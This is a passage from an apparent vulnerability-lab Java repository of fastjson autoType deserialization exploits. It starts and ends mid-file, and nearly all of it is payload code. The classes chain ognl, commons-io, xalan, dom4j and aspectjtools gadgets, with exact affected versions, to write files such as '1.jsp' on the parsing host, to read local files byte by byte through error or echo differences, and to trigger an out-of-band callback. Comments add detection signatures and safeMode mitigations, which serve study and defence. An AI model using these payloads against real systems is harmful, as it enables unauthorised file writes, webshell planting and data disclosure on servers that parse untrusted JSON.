195 | + "";
196 | System.out.println(poc1);
197 |
198 | JSON.parseObject(poc1); // Sink: the vulnerable parse. Mitigation: fastjson safeMode (ParserConfig.setSafeMode) or a release that no longer honours these @type hints removes the autoType behaviour this PoC needs
199 | }
200 | }
201 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson26_ognl_io_write_4.java:
--------------------------------------------------------------------------------
1 | package com.shiro.vuln.fastjson;
2 | import java.io.InputStream;
3 | import java.net.URL;
4 | import java.util.Arrays;
5 | import java.util.Base64;
6 |
7 | import com.alibaba.fastjson.JSON;
8 | import com.alibaba.fastjson.parser.ParserConfig;
9 |
10 |
11 | public class Fastjson26_ognl_io_write_4 { // PoC: ognl + commons-io + commons-codec file-write chain that carries the file content base64-encoded. ParserConfig is imported but unused here — it is also where a defended parser would enable safeMode
12 | public static void main(String[] args) throws Exception { // reads a local file, embeds it in the payload and hands the payload to JSON.parseObject
13 | String url = "file:///D:/Downloads/1.txt"; // the local file whose content is embedded in the payload below
14 | InputStream input = new URL(url).openStream(); // NOTE(review): never closed — try-with-resources would release the handle
15 | byte[] bs = new byte[input.available()]; // NOTE(review): available() is only an estimate and a single read() may return fewer bytes than requested
16 | input.read(bs);
17 | String test = Base64.getEncoder().encodeToString(bs); // base64 text spliced into the payload at "s" below
18 | byte[] testbs = test.getBytes(); // platform-default charset; rendered as the BOM byte list below
19 |
20 | // fastjson 1.2.73-1.2.80, ognl-3.2.21, commons-io-2.2, aspectjtools-1.9.6, commons-codec-1.6
21 | // This chain mainly works around io chains 1-3 being unable to write complex file structures; the file still has to be larger than 8 KB to be written
22 |
23 | String poc1 = "\r\n" // Detection: ognl.*, org.apache.commons.io.*, org.apache.commons.codec.* and org.eclipse.core.internal.* names inside "@type" values are the signature of this chain
24 | + "{\r\n"
25 | + " \"su14\": {\r\n"
26 | + " \"@type\": \"java.lang.Exception\",\r\n"
27 | + " \"@type\": \"ognl.OgnlException\"\r\n"
28 | + " },\r\n"
29 | + " \"su15\": {\r\n"
30 | + " \"@type\": \"java.lang.Class\",\r\n"
31 | + " \"val\": {\r\n"
32 | + " \"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
33 | + " {\r\n"
34 | + " \"@type\": \"java.lang.String\"\r\n"
35 | + " \"@type\": \"ognl.OgnlException\",\r\n"
36 | + " \"_evaluation\": \"\"\r\n"
37 | + " }\r\n"
38 | + " },\r\n"
39 | + " \"su16\": {\r\n" // su16 carries the stream chain; su17/su18 below alias into it via $ref
40 | + " \"@type\": \"ognl.Evaluation\",\r\n"
41 | + " \"node\": {\r\n"
42 | + " \"@type\": \"ognl.ASTMethod\",\r\n"
43 | + " \"p\": {\r\n"
44 | + " \"@type\": \"ognl.OgnlParser\",\r\n"
45 | + " \"stream\": {\r\n"
46 | + " \"@type\":\"org.apache.commons.io.input.BOMInputStream\",\r\n"
47 | + " \"delegate\":{\r\n"
48 | + " \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"
49 | + " \"input\":{\r\n"
50 | + " \"@type\": \"org.apache.commons.codec.binary.Base64InputStream\",\r\n" // decodes the embedded base64 (doEncode:false) as it is read
51 | + " \"in\":{\r\n"
52 | + " \"@type\":\"org.apache.commons.io.input.CharSequenceInputStream\",\r\n"
53 | + " \"charset\":\"utf-8\",\r\n"
54 | + " \"bufferSize\": 1024,\r\n"
55 | + " \"s\":{\"@type\":\"java.lang.String\"\""+test+"\"\r\n" // base64 of the locally read file, embedded as the CharSequenceInputStream source
56 | + " },\r\n"
57 | + " \"doEncode\":false,\r\n"
58 | + " \"lineLength\":1024,\r\n"
59 | + " \"lineSeparator\":\"5ZWKCg==\",\r\n"
60 | + " \"decodingPolicy\":0\r\n"
61 | + " },\r\n"
62 | + " \"branch\":{\r\n"
63 | + " \"@type\":\"org.eclipse.core.internal.localstore.SafeFileOutputStream\",\r\n" // the tee's branch; this is the class that needs aspectjtools on the classpath
64 | + " \"targetPath\":\"1.txt\"\r\n" // write target, relative to the parsing process's working directory. Detection: unexpected files appearing under the application's CWD
65 | + " },\r\n"
66 | + " \"closeBranch\":true\r\n"
67 | + " },\r\n"
68 | + " \"include\":true,\r\n"
69 | + " \"boms\":[{\r\n"
70 | + " \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
71 | + " \"charsetName\": \"UTF-8\",\r\n"
72 | + " \"bytes\":"+Arrays.toString(testbs)+"\r\n" // Arrays.toString renders the base64 text's bytes as a bracketed, comma-separated list, which doubles as a JSON int array
73 | + " }],\r\n"
74 | + "}\r\n"
75 | + " }\r\n"
76 | + " }\r\n"
77 | + " },\r\n"
78 | + " \"su17\": {\r\n"
79 | + " \"$ref\": \"$.su16.node.p.stream\"\r\n" // fastjson JSONPath reference back to the su16 BOMInputStream
80 | + " },\r\n"
81 | + " \"su18\": {\r\n"
82 | + " \"$ref\": \"$.su17.bOM.bytes\"\r\n"
83 | + " }\r\n"
84 | + " }";
85 | System.out.println(poc1);
86 | JSON.parseObject(poc1); // Sink: the vulnerable parse. Mitigation: fastjson safeMode (ParserConfig.setSafeMode) or a release that no longer honours these @type hints removes the autoType behaviour this PoC needs
87 | }
88 | }
89 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson27_xalan_dom4j_io_read_error_dnslog.java:
--------------------------------------------------------------------------------
1 | package com.shiro.vuln.fastjson;
2 | import java.io.InputStream;
3 | import java.net.URL;
4 | import java.util.Arrays;
5 | import java.util.Base64;
6 |
7 | import com.alibaba.fastjson.JSON;
8 |
9 |
10 | public class Fastjson27_xalan_dom4j_io_read_error_dnslog { // PoC: fastjson autoType chain through xalan, dom4j and commons-io classes; the signal is an error difference or an out-of-band (dnslog/httplog) callback rather than an echo
11 | public static void main(String[] args) throws Exception { // builds four payload strings locally and parses them in sequence
12 | String url = "file:///D:/"; // same path the payload names below, read locally so the printed bytes can be compared against the remote result
13 | InputStream input = new URL(url).openStream(); // NOTE(review): never closed — try-with-resources would release the handle
14 | byte[] bs = new byte[input.available()]; // NOTE(review): available() is only an estimate and a single read() may return fewer bytes than requested
15 | input.read(bs);
16 | String test = Base64.getEncoder().encodeToString(bs); // unused in this file
17 | byte[] testbs = test.getBytes(); // unused; also uses the platform-default charset
18 | System.out.println(Arrays.toString(bs));
19 | System.out.println(new String(bs)); // platform-default charset
20 |
21 | // Depends on fastjson 1.2.73-1.2.80, xalan-2.7.2, dom4j-2.1.3, commons-io-2.2. Boolean file read driven by differing error messages or by whether a dnslog/httplog callback arrives
22 | String poc1 = "{\r\n" // poc1-poc3 are preparatory parses; poc4 carries the file read. Detection: org.apache.xml.*, org.apache.xpath.*, org.dom4j.* and org.apache.commons.io.* names inside "@type" values
23 | + " \"@type\": \"java.lang.Exception\",\r\n"
24 | + " \"@type\": \"org.apache.xml.dtm.DTMConfigurationException\",\"locator\":{}\r\n"
25 | + "}";
26 | String poc2 = "{\r\n"
27 | + " \"@type\": \"java.lang.Class\",\r\n"
28 | + " \"val\": {\r\n"
29 | + " \"@type\": \"java.lang.String\" {\r\n"
30 | + " \"@type\": \"java.util.Locale\",\r\n"
31 | + " \"val\": {\r\n"
32 | + " \"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
33 | + " {\r\n"
34 | + " \"@type\": \"java.lang.String\"\r\n"
35 | + " \"@type\": \"org.apache.xml.dtm.DTMConfigurationException\",\r\n"
36 | + " \"locator\": {}\r\n"
37 | + " }\r\n"
38 | + " }\r\n"
39 | + " }";
40 | String poc3 = "{\r\n"
41 | + " \"su14\": {\r\n"
42 | + " \"@type\": \"javax.xml.transform.SourceLocator\",\r\n"
43 | + " \"@type\": \"org.apache.xpath.objects.XNodeSetForDOM\",\r\n"
44 | + " \"nodeIter\": {\r\n"
45 | + " \"@type\": \"org.apache.xpath.NodeSet\"\r\n"
46 | + " },\r\n"
47 | + " \"xctxt\": {\r\n"
48 | + " \"@type\": \"org.apache.xpath.XPathContext\",\r\n"
49 | + " \"primaryReader\": {\r\n"
50 | + " \"@type\": \"org.dom4j.io.XMLWriter\",\r\n"
51 | + " \"entityResolver\": {\r\n"
52 | + " \"@type\": \"org.dom4j.io.SAXContentHandler\",\r\n"
53 | + " \"inputSource\": {\r\n"
54 | + " \"byteStream\": {\r\n"
55 | + " \"@type\": \"java.io.InputStream\"\r\n"
56 | + " }\r\n"
57 | + " }\r\n"
58 | + " }\r\n"
59 | + " }\r\n"
60 | + " }\r\n"
61 | + " }\r\n"
62 | + "}";
63 |
64 | String poc4 = "[{\"su15\":{\r\n" // a JSON array: later elements reference earlier ones by index via $ref
65 | + "\"@type\": \"java.io.InputStream\",\r\n"
66 | + " \"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n" // two "@type" hints on one object — presumably the JDK type is what gets checked and the second name what gets instantiated; confirm against the parser
67 | + " \"delegate\": {\r\n"
68 | + " \"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
69 | + " \"reader\": {\r\n"
70 | + " \"@type\": \"jdk.nashorn.api.scripting.URLReader\",\r\n"
71 | /*file path*/ + " \"url\": \"file:///D:/\"\r\n" // the path read on the target; matches the local reference read above
72 | + " },\r\n"
73 | + " \"charsetName\": \"UTF-8\",\r\n"
74 | + " \"bufferSize\": 1024\r\n"
75 | + " },\r\n"
76 | + " \"boms\": [{\r\n"
77 | + " \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
78 | + " \"charsetName\": \"UTF-8\",\r\n"
79 | + " \"bytes\": [\r\n"
80 | /*file bytes*/ + " 36,82\r\n" // 36,82 = "$R": the leading bytes the target file is compared against in the boolean read described in the note above
81 | + " ]\r\n"
82 | + " }]\r\n"
83 | + " }},\r\n"
84 | + " {\r\n"
85 | + " \"su16\": {\r\n"
86 | + " \"$ref\": \"$[0].su15.bOM.bytes\"\r\n" // fastjson JSONPath reference into the first array element
87 | + " }\r\n"
88 | + " },{\r\n"
89 | + " \"su17\": {\r\n"
90 | + " \"@type\": \"java.io.InputStream\",\r\n"
91 | + " \"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
92 | + " \"delegate\": {\r\n"
93 | + " \"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
94 | + " \"reader\": {\r\n"
95 | + " \"@type\": \"org.apache.commons.io.input.CharSequenceReader\",\r\n"
96 | + " \"charSequence\": {\r\n"
97 | + " \"@type\": \"java.lang.String\" {\r\n"
98 | + " \"$ref\": \"$[1].su16\"\r\n" // feeds su16's resolved value back in as the reader's char sequence
99 | + " },\r\n"
100 | + " \"start\": 0,\r\n"
101 | + " \"end\": 0\r\n"
102 | + " },\r\n"
103 | + " \"charsetName\": \"UTF-8\",\r\n"
104 | + " \"bufferSize\": 1024\r\n"
105 | + " },\r\n"
106 | + " \"boms\": [{\r\n"
107 | + " \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
108 | + " \"charsetName\": \"UTF-8\",\r\n"
109 | + " \"bytes\": [1]\r\n"
110 | + " }]\r\n"
111 | + " }\r\n"
112 | + " },{\r\n"
113 | + " \"su18\": {\r\n"
114 | + " \"@type\": \"java.io.InputStream\",\r\n"
115 | + " \"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
116 | + " \"delegate\": {\r\n"
117 | + " \"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
118 | + " \"reader\": {\r\n"
119 | + " \"@type\": \"jdk.nashorn.api.scripting.URLReader\",\r\n"
120 | /*dnslog*/+ " \"url\": \"http://127.0.0.1:5667\"\r\n" // out-of-band callback endpoint (loopback placeholder here). Detection: the application host resolving or contacting unexpected endpoints while parsing JSON
121 | + " },\r\n"
122 | + " \"charsetName\": \"UTF-8\",\r\n"
123 | + " \"bufferSize\": 1024\r\n"
124 | + " },\r\n"
125 | + " \"boms\": [{\r\n"
126 | + " \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
127 | + " \"charsetName\": \"UTF-8\",\r\n"
128 | + " \"bytes\": [\r\n"
129 | + " 49\r\n"
130 | + " ]\r\n"
131 | + " }]\r\n"
132 | + " }\r\n"
133 | + " },\r\n"
134 | + " {\r\n"
135 | + " \"su19\": {\r\n"
136 | + " \"$ref\": \"$[3].su18.bOM.bytes\"\r\n"
137 | + " }\r\n"
138 | + " }]";
139 |
140 | System.out.println(poc1);
141 | System.out.println(poc2);
142 | System.out.println(poc3);
143 | System.out.println(poc4);
144 | try {
145 | JSON.parseObject(poc1); // presumably expected to throw (poc1 is a bare exception object) — the catch below only keeps the run going
146 | } catch (Exception e) { // NOTE(review): swallowed silently; rename to `ignored` with a reason, or log it, so a different failure is not hidden
147 | }
148 | JSON.parseObject(poc2);
149 | JSON.parseObject(poc3);
150 | JSON.parseObject(poc4); // Sink: the vulnerable parses. Mitigation: fastjson safeMode (ParserConfig.setSafeMode) or a release that no longer honours these @type hints removes the autoType behaviour this PoC needs
151 |
152 | }
153 | }
154 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson28_xalan_dom4j_io_read_print.java:
--------------------------------------------------------------------------------
1 | package com.shiro.vuln.fastjson;
2 | import java.io.InputStream;
3 | import java.net.URL;
4 | import java.util.Arrays;
5 | import java.util.Base64;
6 |
7 | import com.alibaba.fastjson.JSON;
8 | import com.alibaba.fastjson.parser.ParserConfig;
9 |
10 |
11 | public class Fastjson28_xalan_dom4j_io_read_print { // PoC: fastjson autoType chain through xalan, dom4j and commons-io classes; the echoed parse result of poc4 is the signal. ParserConfig is imported but unused here — it is also where a defended parser would enable safeMode
12 | public static void main(String[] args) throws Exception { // builds four payload strings locally and parses them in sequence, echoing the last
13 | String url = "file:///D:/"; // same path the payload names below, read locally so the printed bytes can be compared against the parser's echo
14 | InputStream input = new URL(url).openStream(); // NOTE(review): never closed — try-with-resources would release the handle
15 | byte[] bs = new byte[input.available()]; // NOTE(review): available() is only an estimate and a single read() may return fewer bytes than requested
16 | input.read(bs);
17 | String test = Base64.getEncoder().encodeToString(bs); // unused in this file
18 | byte[] testbs = test.getBytes(); // unused; also uses the platform-default charset
19 | System.out.println(Arrays.toString(bs));
20 | System.out.println(new String(bs)); // platform-default charset
21 |
22 | // Depends on fastjson 1.2.73-1.2.80, xalan-2.7.2, dom4j-2.1.3, commons-io-2.2. Needs response echo: boolean file read from differences in the echoed output (watch the su15 field)
23 | String poc1 = "{\r\n" // poc1-poc3 are preparatory parses; poc4 carries the file read. Detection: org.apache.xml.*, org.apache.xpath.*, org.dom4j.* and org.apache.commons.io.* names inside "@type" values
24 | + " \"@type\": \"java.lang.Exception\",\r\n"
25 | + " \"@type\": \"org.apache.xml.dtm.DTMConfigurationException\",\"locator\":{}\r\n"
26 | + "}";
27 | String poc2 = "{\r\n"
28 | + " \"@type\": \"java.lang.Class\",\r\n"
29 | + " \"val\": {\r\n"
30 | + " \"@type\": \"java.lang.String\" {\r\n"
31 | + " \"@type\": \"java.util.Locale\",\r\n"
32 | + " \"val\": {\r\n"
33 | + " \"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
34 | + " {\r\n"
35 | + " \"@type\": \"java.lang.String\"\r\n"
36 | + " \"@type\": \"org.apache.xml.dtm.DTMConfigurationException\",\r\n"
37 | + " \"locator\": {}\r\n"
38 | + " }\r\n"
39 | + " }\r\n"
40 | + " }";
41 | String poc3 = "{\r\n"
42 | + " \"su14\": {\r\n"
43 | + " \"@type\": \"javax.xml.transform.SourceLocator\",\r\n"
44 | + " \"@type\": \"org.apache.xpath.objects.XNodeSetForDOM\",\r\n"
45 | + " \"nodeIter\": {\r\n"
46 | + " \"@type\": \"org.apache.xpath.NodeSet\"\r\n"
47 | + " },\r\n"
48 | + " \"xctxt\": {\r\n"
49 | + " \"@type\": \"org.apache.xpath.XPathContext\",\r\n"
50 | + " \"primaryReader\": {\r\n"
51 | + " \"@type\": \"org.dom4j.io.XMLWriter\",\r\n"
52 | + " \"entityResolver\": {\r\n"
53 | + " \"@type\": \"org.dom4j.io.SAXContentHandler\",\r\n"
54 | + " \"inputSource\": {\r\n"
55 | + " \"byteStream\": {\r\n"
56 | + " \"@type\": \"java.io.InputStream\"\r\n"
57 | + " }\r\n"
58 | + " }\r\n"
59 | + " }\r\n"
60 | + " }\r\n"
61 | + " }\r\n"
62 | + " }\r\n"
63 | + "}";
64 |
65 | String poc4 = "{\"su15\":{\r\n" // single object (no $ref aliases); its echo is what the author's note says to watch
66 | + " \"@type\": \"java.io.InputStream\",\r\n"
67 | + " \"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n" // two "@type" hints on one object — presumably the JDK type is what gets checked and the second name what gets instantiated; confirm against the parser
68 | + " \"delegate\": {\r\n"
69 | + " \"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
70 | + " \"reader\": {\r\n"
71 | + " \"@type\": \"jdk.nashorn.api.scripting.URLReader\",\r\n"
72 | /*file location*/+ " \"url\": \"file:///D:/\"\r\n" // the path read on the target; matches the local reference read above
73 | + " },\r\n"
74 | + " \"charsetName\": \"UTF-8\",\r\n"
75 | + " \"bufferSize\": 1024\r\n"
76 | + " },\r\n"
77 | + " \"boms\": [{\r\n"
78 | + " \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
79 | + " \"charsetName\": \"UTF-8\",\r\n"
80 | + " \"bytes\": [\r\n"
81 | /*file bytes*/+ " 36,82\r\n" // 36,82 = "$R": the leading bytes the target file is compared against in the boolean read described in the note above
82 | + " ]\r\n"
83 | + " }]\r\n"
84 | + " }}";
85 |
86 | System.out.println(poc1);
87 | System.out.println(poc2);
88 | System.out.println(poc3);
89 | System.out.println(poc4);
90 | try {
91 | JSON.parseObject(poc1); // presumably expected to throw (poc1 is a bare exception object) — the catch below only keeps the run going
92 | } catch (Exception e) { // NOTE(review): swallowed silently; rename to `ignored` with a reason, or log it, so a different failure is not hidden
93 | }
94 | JSON.parseObject(poc2);
95 | JSON.parseObject(poc3);
96 | System.out.println(JSON.parseObject(poc4)); // Sink: the vulnerable parse, and the echo the boolean read depends on. Mitigation: fastjson safeMode (ParserConfig.setSafeMode) or a release that no longer honours these @type hints removes the autoType behaviour this PoC needs
97 |
98 | }
99 | }
100 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson29_xalan_dom4j_io_write_1.java:
--------------------------------------------------------------------------------
1 | package com.shiro.vuln.fastjson;
2 |
3 | import com.alibaba.fastjson.JSON;
4 |
5 |
/**
 * Lab PoC that hands four hand-built JSON documents to {@code JSON.parseObject}.
 * The last one (poc4) names {@code org.apache.commons.io.output.FileWriterWithEncoding}
 * with {@code "file": "1.jsp"}, so a successful parse writes that file into the JVM's
 * working directory. Run only on a disposable host.
 * <p>
 * Defensive note: the underlying weakness is accepting attacker-controlled JSON that
 * carries {@code @type} on a fastjson build in the range given in main(). Upgrading, or
 * enabling fastjson's safeMode (which ignores {@code @type} altogether), removes the
 * issue; an unexpected {@code 1.jsp} appearing in the application's working directory is
 * the observable artefact of this particular payload.
 */
public class Fastjson29_xalan_dom4j_io_write_1 {
    /**
     * Builds the payloads, prints them, and parses them in order.
     *
     * @param args unused
     * @throws Exception anything thrown while parsing poc2-poc4; poc1's exception is
     *         discarded by the empty catch so the remaining parses run regardless
     */
    public static void main(String[] args) throws Exception {
        // Content embedded in poc4: "test" followed by 8200 'a' characters.
        String code = "test";
        for (int i = 0; i < 8200; i++) {
            code += "a";
        }
        // Dependencies: fastjson 1.2.73-1.2.80, xalan-2.7.2, dom4j-2.1.3, commons-io-2.0-2.6
        String poc1 = "{\r\n"
            + " \"@type\": \"java.lang.Exception\",\r\n"
            + " \"@type\": \"org.apache.xml.dtm.DTMConfigurationException\",\"locator\":{}\r\n"
            + "}";
        String poc2 = "{\r\n"
            + " \"@type\": \"java.lang.Class\",\r\n"
            + " \"val\": {\r\n"
            + " \"@type\": \"java.lang.String\" {\r\n"
            + " \"@type\": \"java.util.Locale\",\r\n"
            + " \"val\": {\r\n"
            + " \"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
            + " {\r\n"
            + " \"@type\": \"java.lang.String\"\r\n"
            + " \"@type\": \"org.apache.xml.dtm.DTMConfigurationException\",\r\n"
            + " \"locator\": {}\r\n"
            + " }\r\n"
            + " }\r\n"
            + " }";
        String poc3 = "{\r\n"
            + " \"su14\": {\r\n"
            + " \"@type\": \"javax.xml.transform.SourceLocator\",\r\n"
            + " \"@type\": \"org.apache.xpath.objects.XNodeSetForDOM\",\r\n"
            + " \"nodeIter\": {\r\n"
            + " \"@type\": \"org.apache.xpath.NodeSet\"\r\n"
            + " },\r\n"
            + " \"xctxt\": {\r\n"
            + " \"@type\": \"org.apache.xpath.XPathContext\",\r\n"
            + " \"primaryReader\": {\r\n"
            + " \"@type\": \"org.dom4j.io.XMLWriter\",\r\n"
            + " \"entityResolver\": {\r\n"
            + " \"@type\": \"org.dom4j.io.SAXContentHandler\",\r\n"
            + " \"inputSource\": {\r\n"
            + " \"byteStream\": {\r\n"
            + " \"@type\": \"java.io.InputStream\"\r\n"
            + " }\r\n"
            + " }\r\n"
            + " }\r\n"
            + " }\r\n"
            + " }\r\n"
            + " }\r\n"
            + "}";

        // poc4: the writer target "1.jsp" is the file written on the host when this parses.
        String poc4 = "{\r\n"
            + " \"su16\": {\r\n"
            + " \"@type\": \"java.io.InputStream\",\r\n"
            + " \"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
            + " \"delegate\": {\r\n"
            + " \"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
            + " \"reader\": {\r\n"
            + " \"@type\": \"org.apache.commons.io.input.XmlStreamReader\",\r\n"
            + " \"is\": {\r\n"
            + " \"@type\": \"org.apache.commons.io.input.TeeInputStream\",\r\n"
            + " \"input\": {\r\n"
            + " \"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
            + " \"reader\": {\r\n"
            + " \"@type\": \"org.apache.commons.io.input.CharSequenceReader\",\r\n"
            + " \"charSequence\":{\"@type\":\"java.lang.String\"\""+code+"\"\r\n"
            + " },\r\n"
            + " \"charsetName\":\"UTF-8\",\r\n"
            + " \"bufferSize\":1024\r\n"
            + " },\r\n"
            + " \"branch\": {\r\n"
            + " \"@type\": \"org.apache.commons.io.output.WriterOutputStream\",\r\n"
            + " \"writer\": {\r\n"
            + " \"@type\": \"org.apache.commons.io.output.FileWriterWithEncoding\",\r\n"
            + " \"file\": \"1.jsp\",\r\n"
            + " \"encoding\": \"UTF-8\",\r\n"
            + " \"append\": false\r\n"
            + " },\r\n"
            + " \"charsetName\": \"UTF-8\",\r\n"
            + " \"bufferSize\": 1024,\r\n"
            + " \"writeImmediately\": true\r\n"
            + " },\r\n"
            + " \"closeBranch\": true\r\n"
            + " },\r\n"
            + " \"httpContentType\": \"text/xml\",\r\n"
            + " \"lenient\": false,\r\n"
            + " \"defaultEncoding\": \"UTF-8\"\r\n"
            + " },\r\n"
            + " \"charsetName\": \"UTF-8\",\r\n"
            + " \"bufferSize\": 1024\r\n"
            + " },\r\n"
            + " \"boms\": [{\r\n"
            + " \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
            + " \"charsetName\": \"UTF-8\",\r\n"
            + " \"bytes\": [\r\n"
            + " 36, 82\r\n"
            + " ]\r\n"
            + " }]\r\n"
            + " },\r\n"
            + " \"su17\": {\r\n"
            + " \"@type\": \"java.io.InputStream\",\r\n"
            + " \"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
            + " \"delegate\": {\r\n"
            + " \"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
            + " \"reader\": {\r\n"
            + " \"@type\": \"org.apache.commons.io.input.XmlStreamReader\",\r\n"
            + " \"is\": {\r\n"
            + " \"@type\": \"org.apache.commons.io.input.TeeInputStream\",\r\n"
            + " \"input\": {\r\n"
            + " \"$ref\": \"$.su16.delegate.reader.is.input\"\r\n"
            + " },\r\n"
            + " \"branch\": {\r\n"
            + " \"$ref\": \"$.su16.delegate.reader.is.branch\"\r\n"
            + " },\r\n"
            + " \"closeBranch\": true\r\n"
            + " },\r\n"
            + " \"httpContentType\": \"text/xml\",\r\n"
            + " \"lenient\": false,\r\n"
            + " \"defaultEncoding\": \"UTF-8\"\r\n"
            + " },\r\n"
            + " \"charsetName\": \"UTF-8\",\r\n"
            + " \"bufferSize\": 1024\r\n"
            + " },\r\n"
            + " \"boms\": [{\r\n"
            + " \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
            + " \"charsetName\": \"UTF-8\",\r\n"
            + " \"bytes\": [\r\n"
            + " 36, 82\r\n"
            + " ]\r\n"
            + " }]\r\n"
            + " },\r\n"
            + " \"su18\": {\r\n"
            + " \"@type\": \"java.io.InputStream\",\r\n"
            + " \"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
            + " \"delegate\": {\r\n"
            + " \"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
            + " \"reader\": {\r\n"
            + " \"@type\": \"org.apache.commons.io.input.XmlStreamReader\",\r\n"
            + " \"is\": {\r\n"
            + " \"@type\": \"org.apache.commons.io.input.TeeInputStream\",\r\n"
            + " \"input\": {\r\n"
            + " \"$ref\": \"$.su16.delegate.reader.is.input\"\r\n"
            + " },\r\n"
            + " \"branch\": {\r\n"
            + " \"$ref\": \"$.su16.delegate.reader.is.branch\"\r\n"
            + " },\r\n"
            + " \"closeBranch\": true\r\n"
            + " },\r\n"
            + " \"httpContentType\": \"text/xml\",\r\n"
            + " \"lenient\": false,\r\n"
            + " \"defaultEncoding\": \"UTF-8\"\r\n"
            + " },\r\n"
            + " \"charsetName\": \"UTF-8\",\r\n"
            + " \"bufferSize\": 1024\r\n"
            + " },\r\n"
            + " \"boms\": [{\r\n"
            + " \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
            + " \"charsetName\": \"UTF-8\",\r\n"
            + " \"bytes\": [\r\n"
            + " 36, 82\r\n"
            + " ]\r\n"
            + " }]\r\n"
            + " },\r\n"
            + " \"su19\": {\r\n"
            + " \"@type\": \"java.io.InputStream\",\r\n"
            + " \"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
            + " \"delegate\": {\r\n"
            + " \"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
            + " \"reader\": {\r\n"
            + " \"@type\": \"org.apache.commons.io.input.XmlStreamReader\",\r\n"
            + " \"is\": {\r\n"
            + " \"@type\": \"org.apache.commons.io.input.TeeInputStream\",\r\n"
            + " \"input\": {\r\n"
            + " \"$ref\": \"$.su16.delegate.reader.is.input\"\r\n"
            + " },\r\n"
            + " \"branch\": {\r\n"
            + " \"$ref\": \"$.su16.delegate.reader.is.branch\"\r\n"
            + " },\r\n"
            + " \"closeBranch\": true\r\n"
            + " },\r\n"
            + " \"httpContentType\": \"text/xml\",\r\n"
            + " \"lenient\": false,\r\n"
            + " \"defaultEncoding\": \"UTF-8\"\r\n"
            + " },\r\n"
            + " \"charsetName\": \"UTF-8\",\r\n"
            + " \"bufferSize\": 1024\r\n"
            + " },\r\n"
            + " \"boms\": [{\r\n"
            + " \"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
            + " \"charsetName\": \"UTF-8\",\r\n"
            + " \"bytes\": [\r\n"
            + " 36, 82\r\n"
            + " ]\r\n"
            + " }]\r\n"
            + " }\r\n"
            + " }";

        System.out.println(poc1);
        System.out.println(poc2);
        System.out.println(poc3);
        System.out.println(poc4);
        try {
            JSON.parseObject(poc1);
        } catch (Exception e) {
            // Exception discarded (empty catch in the original); poc2-poc4 are parsed regardless.
        }
        JSON.parseObject(poc2);
        JSON.parseObject(poc3);
        JSON.parseObject(poc4);

    }
}
215 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson30_xalan_dom4j_io_write_2.java:
--------------------------------------------------------------------------------
1 | package com.shiro.vuln.fastjson;
2 |
3 | import com.alibaba.fastjson.JSON;
4 |
5 |
/**
 * Lab PoC: a variant of Fastjson29 targeting a different commons-io range (see the
 * dependency note in main()). As there, poc4 names
 * {@code org.apache.commons.io.output.FileWriterWithEncoding} with {@code "file": "1.jsp"},
 * so a successful parse writes that file into the JVM's working directory. Run only on a
 * disposable host.
 * <p>
 * Defensive note: parsing attacker-controlled JSON carrying {@code @type} on an affected
 * fastjson build is the root issue; upgrading or enabling fastjson's safeMode (which
 * ignores {@code @type} altogether) removes it. An unexpected {@code 1.jsp} in the
 * application's working directory is the observable artefact of this payload.
 */
public class Fastjson30_xalan_dom4j_io_write_2 {
    /**
     * Builds the payloads, prints them, and parses them in order.
     *
     * @param args unused
     * @throws Exception anything thrown while parsing poc2-poc4; poc1's exception is
     *         discarded by the empty catch so the remaining parses run regardless
     */
    public static void main(String[] args) throws Exception {
        // Content embedded in poc4: "test" followed by 8200 'a' characters.
        String code = "test";
        for (int i = 0; i < 8200; i++) {
            code += "a";
        }

        // Dependencies: fastjson 1.2.73-1.2.80, xalan-2.7.2, dom4j-2.1.3, commons-io-2.7/2.8
        String poc1 = "{\r\n"
            + " \"@type\": \"java.lang.Exception\",\r\n"
            + " \"@type\": \"org.apache.xml.dtm.DTMConfigurationException\",\"locator\":{}\r\n"
            + "}";
        String poc2 = "{\r\n"
            + " \"@type\": \"java.lang.Class\",\r\n"
            + " \"val\": {\r\n"
            + " \"@type\": \"java.lang.String\" {\r\n"
            + " \"@type\": \"java.util.Locale\",\r\n"
            + " \"val\": {\r\n"
            + " \"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
            + " {\r\n"
            + " \"@type\": \"java.lang.String\"\r\n"
            + " \"@type\": \"org.apache.xml.dtm.DTMConfigurationException\",\r\n"
            + " \"locator\": {}\r\n"
